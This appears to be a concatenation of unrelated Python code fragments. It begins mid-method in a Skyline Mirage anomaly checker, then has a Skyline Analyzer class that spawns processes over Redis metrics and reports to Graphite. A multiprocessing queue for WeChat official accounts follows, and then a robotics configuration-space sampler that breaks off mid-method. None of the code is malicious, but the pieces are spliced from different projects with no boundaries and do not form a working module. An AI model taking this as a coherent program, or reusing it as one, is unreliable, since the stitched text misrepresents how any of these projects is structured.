                        logger.info(traceback.format_exc())

                # If crucible is enabled - save timeseries and create a
                # crucible check
                if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
                    metric_timestamp = str(int(timeseries[-1][0]))
                    from_timestamp = str(int(timeseries[1][0]))
                    timeseries_dir = base_name.replace('.', '/')
                    crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                    self._ensure_dir(crucible_anomaly_dir)

                    # Note:
                    # The value is enclosed is single quoted intentionally
                    # as the imp.load_source used in crucible results in a
                    # shift in the decimal position when double quoted, e.g.
                    # value = "5622.0" gets imported as
                    # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                    # single quoting results in the desired,
                    # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                    crucible_anomaly_data = (
                        'metric = \'%s\'\n'
                        'value = \'%s\'\n'
                        'from_timestamp = \'%s\'\n'
                        'metric_timestamp = \'%s\'\n'
                        'algorithms = %s\n'
                        'triggered_algorithms = %s\n'
                        'anomaly_dir = \'%s\'\n'
                        'graphite_metric = True\n'
                        'run_crucible_tests = False\n'
                        'added_by = \'%s\'\n'
                        'added_at = \'%s\'\n'
                        % (base_name, str(datapoint), from_timestamp,
                           metric_timestamp, str(settings.MIRAGE_ALGORITHMS),
                           triggered_algorithms, crucible_anomaly_dir,
                           skyline_app, metric_timestamp))

                    # Create an anomaly file with details about the anomaly
                    crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_anomaly_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                    except Exception:
                        logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                        logger.info(traceback.format_exc())

                    # Create timeseries json file with the timeseries
                    json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                    timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                    try:
                        write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                        logger.info('added crucible timeseries file :: %s' % (json_file))
                    except Exception:
                        logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                        logger.info(traceback.format_exc())

                    # Create a crucible check file
                    crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                    try:
                        write_data_to_file(
                            skyline_app, crucible_check_file, 'w',
                            crucible_anomaly_data)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                    except Exception:
                        logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                        logger.info(traceback.format_exc())
            else:
                base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
                not_anomalous_metric = [datapoint, base_name]
                self.not_anomalous_metrics.append(not_anomalous_metric)
                logger.info('not anomalous :: %s with %s' % (metric_vars.metric, metric_vars.value))

        # It could have been deleted by the Roomba
        except TypeError:
            exceptions['DeletedByRoomba'] += 1
            logger.info('exceptions :: DeletedByRoomba')
        except TooShort:
            exceptions['TooShort'] += 1
            logger.info('exceptions :: TooShort')
        except Stale:
            exceptions['Stale'] += 1
            logger.info('exceptions :: Stale')
        except Boring:
            exceptions['Boring'] += 1
            logger.info('exceptions :: Boring')
        except Exception:
            exceptions['Other'] += 1
            logger.info('exceptions :: Other')
            logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.mirage_anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.mirage_exceptions_q.put((key, value))

        # Remove metric check file
        try:
            os.remove(metric_check_file)
        except OSError:
            pass

    def run(self):
        """
        Called when the process intializes.

        Waits for check files, spawns a ``spin_process`` for the oldest one,
        collates what the process reported and sends alerts.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Determine if any metric to analyze
            while True:

                # Report app up
                self.redis_conn.setex(skyline_app, 120, now)

                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) == 0:
                    logger.info('sleeping no metrics...')
                    sleep(10)
                else:
                    sleep(1)

                # Clean up old files
                now_timestamp = time()
                stale_age = now_timestamp - settings.MIRAGE_STALE_SECONDS
                for current_file in listdir(settings.MIRAGE_CHECK_PATH):
                    if os.path.isfile(settings.MIRAGE_CHECK_PATH + "/" + current_file):
                        t = os.stat(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                        c = t.st_ctime
                        # delete file if older than MIRAGE_STALE_SECONDS
                        if c < stale_age:
                            os.remove(settings.MIRAGE_CHECK_PATH + "/" + current_file)
                            logger.info('removed %s' % (current_file))

                # Discover metric to analyze
                metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]
                if len(metric_var_files) > 0:
                    break

            metric_var_files_sorted = sorted(metric_var_files)
            metric_check_file = settings.MIRAGE_CHECK_PATH + "/" + metric_var_files_sorted[0]

            logger.info('processing %s' % metric_var_files_sorted[0])

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except Exception:
                logger.error('failed to cleanup mirage_algorithm.error files - %s' % (traceback.format_exc()))

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            MIRAGE_PROCESSES = 1
            run_timestamp = int(now)
            for i in range(1, MIRAGE_PROCESSES + 1):
                p = Process(target=self.spin_process, args=(i, run_timestamp))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(MIRAGE_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Self monitor processes and terminate if any spin_process has run
            # for longer than MAX_ANALYZER_PROCESS_RUNTIME - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (
                        skyline_app, str(MIRAGE_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.MIRAGE_ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except Exception:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            anomaly_breakdown = self._drain_queue(self.mirage_anomaly_breakdown_q)
            exceptions = self._drain_queue(self.mirage_exceptions_q)

            # spin_process may have exited before reporting any variable, so
            # every name read below gets a default for this iteration.
            metric_name = None
            metric_value = None
            hours_to_resolve = None
            metric_timestamp = None
            for metric_variable in self.metric_variables:
                if metric_variable[0] == 'metric_name':
                    metric_name = metric_variable[1]
                if metric_variable[0] == 'metric_value':
                    metric_value = metric_variable[1]
                if metric_variable[0] == 'hours_to_resolve':
                    hours_to_resolve = metric_variable[1]
                if metric_variable[0] == 'metric_timestamp':
                    metric_timestamp = metric_variable[1]

            logger.info('analysis done - %s' % metric_name)

            # Send alerts
            # Calculate hours second order resolution to seconds
            if hours_to_resolve is None:
                logger.error('error :: no metric variables were reported by spin_process, not alerting')
                second_order_resolution_seconds = None
            else:
                logger.info('analyzed at %s hours resolution' % hours_to_resolve)
                second_order_resolution_seconds = int(hours_to_resolve) * 3600
                logger.info('analyzed at %s seconds resolution' % second_order_resolution_seconds)
            can_alert = second_order_resolution_seconds is not None

            if can_alert and settings.MIRAGE_ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'mirage.last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    self.redis_conn.setex(cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric, second_order_resolution_seconds)
                                    logger.info('sent %s alert: For %s' % (alert[1], metric[1]))
                            except Exception as e:
                                logger.error('error :: could not send %s alert for %s: %s' % (alert[1], metric[1], e))

            if can_alert and settings.NEGATE_ANALYZER_ALERTS:
                if len(self.anomalous_metrics) == 0:
                    for negate_alert in settings.ALERTS:
                        for not_anomalous_metric in self.not_anomalous_metrics:
                            NEGATE_ALERT_MATCH_PATTERN = negate_alert[0]
                            NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1]
                            alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN)
                            negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN)
                            if negate_pattern_match:
                                try:
                                    logger.info('negate alert sent: For %s' % (not_anomalous_metric[1]))
                                    trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value)
                                except Exception as e:
                                    logger.error('error :: could not send alert: %s' % e)

            # Log progress
            if len(self.anomalous_metrics) > 0:
                logger.info('seconds since last anomaly :: %.2f' % (time() - now))
                logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
                logger.info('exception stats :: %s' % exceptions)
                logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Reset counters
            self.anomalous_metrics[:] = []
            self.not_anomalous_metrics[:] = []

            # Reset metric_variables
            self.metric_variables[:] = []

            # Sleep if it went too fast
            if time() - now < 1:
                logger.info('sleeping due to low run time...')
                sleep(1)
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        :param parent_pid: pid of the parent process, used by
            :func:`check_if_parent_is_alive`.
        """
        super(Analyzer, self).__init__()
        # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
        if settings.REDIS_PASSWORD:
            self.redis_conn = StrictRedis(
                password=settings.REDIS_PASSWORD,
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        else:
            self.redis_conn = StrictRedis(
                unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Exit the current process if it, or its parent, can no longer be
        signalled.
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except Exception:
            exit(0)

    @staticmethod
    def _drain_queue(q):
        """
        Empty ``q`` of ``(key, value)`` tuples and return the per-key sums.
        """
        totals = dict()
        while 1:
            try:
                key, value = q.get_nowait()
            except Empty:
                break
            if key not in totals:
                totals[key] = value
            else:
                totals[key] += value
        return totals

    @staticmethod
    def _read_float_lines(filename):
        """
        Read one float per line from ``filename``, ignoring single quotes.

        :return: the list of floats, or an empty list when the file cannot
            be read or any line is not a number.
        """
        values = []
        try:
            with open(filename, 'r') as f:
                for line in f:
                    values.append(float(line.replace('\n', '').replace("'", '')))
        except (IOError, OSError, ValueError):
            return []
        return values

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.

        :param name: metric name, appended to the skyline_app namespace.
        :param value: the value to send, already formatted as a string.
        :return: True when the metric was sent, False otherwise.
        """
        if settings.GRAPHITE_HOST == '':
            return False

        # The same host that is connected to is the one that gets reported
        endpoint = '%s:%s' % (settings.GRAPHITE_HOST, settings.CARBON_PORT)
        skyline_app_metric = skyline_app_graphite_namespace + name
        payload = '%s %s %i\n' % (skyline_app_metric, value, time())
        # Python 3 sockets only accept bytes, Python 2 str already is bytes
        if not isinstance(payload, bytes):
            payload = payload.encode('utf-8')

        sock = socket.socket()
        try:
            sock.settimeout(10)
            # Handle connection error to Graphite #116 @etsy
            # Fixed as per https://github.com/etsy/skyline/pull/116 and
            # mlowicki:etsy_handle_connection_error_to_graphite
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
            except socket.error:
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False
            sock.settimeout(None)
            try:
                sock.sendall(payload)
            except socket.error:
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False
            return True
        finally:
            # Always release the descriptor, including on the error paths
            sock.close()

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multi get the assigned metrics for the process from Redis and for
        each metric:

        * unpack the raw timeseries for the metric.
        * analyse the timeseries against `ALGORITHMS` to determine if it is
          anomalous.
        * if anomalous add it to the :obj:`self.anomalous_metrics` list and
          count the algorithms that triggered.

        The anomaly breakdown and the exception counts are put on
        :obj:`self.anomaly_breakdown_q` and :obj:`self.exceptions_q` so the
        parent process can collate them.

        :param i: 1-based number of this process.
        :param unique_metrics: list of all the metric keys to share out.
        """
        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(
            ceil(
                float(len(unique_metrics)) /
                float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for position, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[position]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(
                    timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except Exception:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process intializes.

        Determine if Redis is up and discover the number of unique metrics.

        Divide the `unique_metrics` between the number of
        `ANALYZER_PROCESSES` and assign each process a set of metrics to
        analyse for anomalies.

        Wait for the processes to finish (terminating them after 180
        seconds) and collate what they reported.

        Log the details about the run to the skyline log.

        Send skyline.analyzer metrics to `GRAPHITE_HOST`.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error(
                'error - bin/%s.d log management seems to have failed, continuing'
                % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            # 0o750 is valid octal syntax on Python 2.6+ and Python 3, the
            # bare 0750 form does not even compile on Python 3.
            os.makedirs(settings.SKYLINE_TMP_DIR, 0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except Exception:
                logger.error(
                    'skyline can\'t connect to redis at socket path %s' %
                    settings.REDIS_SOCKET_PATH)
                sleep(10)
                # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
                if settings.REDIS_PASSWORD:
                    self.redis_conn = StrictRedis(
                        password=settings.REDIS_PASSWORD,
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                else:
                    self.redis_conn = StrictRedis(
                        unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(
                self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info(
                    'no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable
            # metrics for algorithm run times, etc - truncate them per run
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                with open(algorithm_count_file, 'w'):
                    pass
                with open(algorithm_timings_file, 'w'):
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info(
                        'WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info(
                        '%s :: %s spin_process/es completed in %.2f seconds' %
                        (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info(
                    '%s :: timed out, killing all spin_process processes' %
                    (skyline_app))
                for p in pids:
                    p.terminate()
                    # p.join()

            # Grab data from the queue and populate dictionaries
            anomaly_breakdown = self._drain_queue(self.anomaly_breakdown_q)
            exceptions = self._drain_queue(self.exceptions_q)

            # Using count files rather that multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                algorithm_count_array = self._read_float_lines(algorithm_count_file)
                if not algorithm_count_array:
                    continue
                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info('algorithm run count - %s run %s times' % (algorithm, str(number_of_times_algorithm_run)))

                algorithm_timings_array = self._read_float_lines(algorithm_timings_file)
                if not algorithm_timings_array:
                    continue
                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info('algorithm timings count - %s has %s timings' % (algorithm, str(number_of_algorithm_timings)))

                sum_of_algorithm_timings = round(sum(algorithm_timings_array), 6)

                try:
                    _median_algorithm_timing = determine_median(
                        algorithm_timings_array)
                except Exception:
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' %
                    (algorithm, sum_of_algorithm_timings, median_algorithm_timing))
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_metric_name, '%d' % number_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % sum_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run :: %.2f' % (time() - now))
            logger.info('total metrics :: %d' % len(unique_metrics))
            logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric(
                'total_analyzed', '%.2f' %
                (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                # An empty series, or one spanning no time at all, cannot be
                # projected and must not take the whole thread down.
                time_human = 0
                if timeseries:
                    # 3600.0 so integer timestamps do not truncate to whole
                    # hours under Python 2
                    time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600.0
                if time_human:
                    projected = 24 * (time() - now) / time_human

                    logger.info('canary duration :: %.2f' % time_human)
                    self.send_graphite_metric('duration', '%.2f' % time_human)
                    self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original for this was a value of 5 seconds which does
            # not make skyline Analyzer very efficient in terms of installations
            # where 100s of 1000s of metrics are being analyzed. This lead to
            # Analyzer running over several metrics multiple time in a minute
            # and always working. Therefore the
            # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to
            # self optimise in cases where skyline is NOT deployed to analyze
            # 100s of 1000s of metrics. This relates to optimising performance
            # for any deployments in the few 1000s and 60 second resolution
            # area, e.g. smaller and local deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                logger.info(
                    'sleeping for %.2f seconds due to low run time...' %
                    sleep_for)
                sleep(sleep_for)
class Queue_server(object):
    """Process-shared queue of official accounts plus a list of failed ones.

    Both containers are ``multiprocessing.Manager`` proxies.  Accounts that
    failed are recorded with :meth:`put_fail_wx` and pushed back onto the
    queue by :meth:`print_fail_list`.
    """

    def __init__(self, wx_lists=()):
        """Initialise the official-account queue.

        :param wx_lists: tuple of official accounts to enqueue right away.
        """
        # A single manager backs both proxies, so only one server process is
        # started for the whole object.
        manager = Manager()
        self.__queue = manager.Queue(-1)
        self.init_wx_lists(wx_lists)
        self.__fail_list = manager.list()

    def init_wx_lists(self, wx_lists=()):
        """Enqueue every official account in ``wx_lists``.

        :param wx_lists: tuple of official accounts.
        """
        for wx in wx_lists:
            self.put(wx)

    def put(self, value):
        """Add an element to the queue.

        :param value: the element to add (any type).
        """
        self.__queue.put(value)

    def get(self):
        """Pop the next element.

        :return: the element, or ``False`` when the queue is empty.
        """
        # NOTE(review): empty() and get() are two separate calls; with more
        # than one consumer get() could still block - confirm against callers.
        if not self.empty():
            return self.__queue.get()
        return False

    def get_wx_lists_queue(self):
        """Return the underlying queue proxy."""
        return self.__queue

    def get_size(self):
        """Return the number of queued elements (int)."""
        return self.__queue.qsize()

    def empty(self):
        """Return ``True`` when the queue is empty."""
        return self.__queue.empty()

    def put_fail_wx(self, wx_data):
        """Record a failed official account.

        :param wx_data: tuple describing the official account.
        """
        self.__fail_list.append(wx_data)

    def print_fail_list(self, flush=None):
        """Print the failed accounts and put each of them back on the queue.

        :param flush: when falsy (the default) the failure list is emptied
            after re-queueing; when truthy the entries are kept, and
            ``all success`` is printed if there were no failures at all.
        """
        if len(self.__fail_list) > 0:
            for fail in self.__fail_list:
                self.put(fail)
                print('the fail wx : {0}'.format(fail))
            if not flush:
                # Clear in place: the proxy stays valid for anyone holding
                # it, and no additional manager process is spawned.
                del self.__fail_list[:]
        elif flush:
            print('all success')

    def is_have_failed(self):
        """Return ``True`` if the queue is not empty.

        Used to check whether failed official accounts were re-added to the
        queue.
        """
        return not self.empty()
class SampleManager:
    """Sample a 2-D scaled configuration space and keep the results.

    ``mFreeSamples`` / ``mObstSamples`` hold plain ``(x, y)`` tuples
    classified by the collision manager; ``mDistSamples`` holds
    ``DistSample`` objects (a point together with a radius).
    """

    def __init__(self, CSpace):
        """Bind the manager to ``CSpace`` and create empty sample stores.

        @param CSpace: configuration space; its ``mCollisionMgr`` attribute
            answers every collision query made by this class.
        """
        self.mCSpace = CSpace
        self.mCollisionMgr = CSpace.mCollisionMgr
        self.mDistSamples = Manager().list()
        self.mFreeSamples = []
        self.mObstSamples = []
        self.g_failTimes = Value('i', 0)

    def simpleSample(self, num):
        """Randomly sample the world ``num`` times and save all samples.

        Points are drawn in scaled coordinates, mapped to the unscaled space
        for the collision query and stored (scaled) in ``mFreeSamples`` or
        ``mObstSamples``.
        """
        for _ in range(num):
            x = randrange(0, self.mCSpace.mScaledWidth)
            y = randrange(0, self.mCSpace.mScaledHeight)
            alpha, phi = self.mCSpace.map2UnscaledSpace(x, y)
            if self.mCollisionMgr.ifCollide((alpha, phi)):
                self.mObstSamples.append((x, y))
            else:
                self.mFreeSamples.append((x, y))

    def sampleFree(self, num):
        """Sample free space only and return ``num`` samples.

        The returned list also replaces ``self.mFreeSamples``.
        """
        freeSamp = []
        while len(freeSamp) < num:
            x = randrange(0, self.mCSpace.mScaledWidth)
            y = randrange(0, self.mCSpace.mScaledHeight)
            alpha, phi = self.mCSpace.map2UnscaledSpace(x, y)
            if not self.mCollisionMgr.ifCollide((alpha, phi)):
                freeSamp.append((x, y))
        self.mFreeSamples = freeSamp
        print("Finished sampling free space, got {0} samples!".format(len(freeSamp)))
        return freeSamp

    def getARandomFreeSample(self, num):
        """Randomly sample the space and return a free sample with distance info.

        The sample is not inside any sphere already in ``self.mDistSamples``.
        The new sample is NOT added to ``self.mDistSamples`` by this method.

        @param num: failure budget.  After ``num`` failed attempts ``None``
            is returned.
        @return: a ``DistSample`` or ``None``.
        """
        width = self.mCSpace.mScaledWidth
        height = self.mCSpace.mScaledHeight
        failTime = 0
        while failTime < num:
            rnd1 = randrange(0, width)
            rnd2 = randrange(0, height)
            alpha, phi = self.mCSpace.map2UnscaledSpace(rnd1, rnd2)
            if self.mCollisionMgr.ifCollide((alpha, phi)):
                # Colliding draws are retried without counting as a failure.
                continue
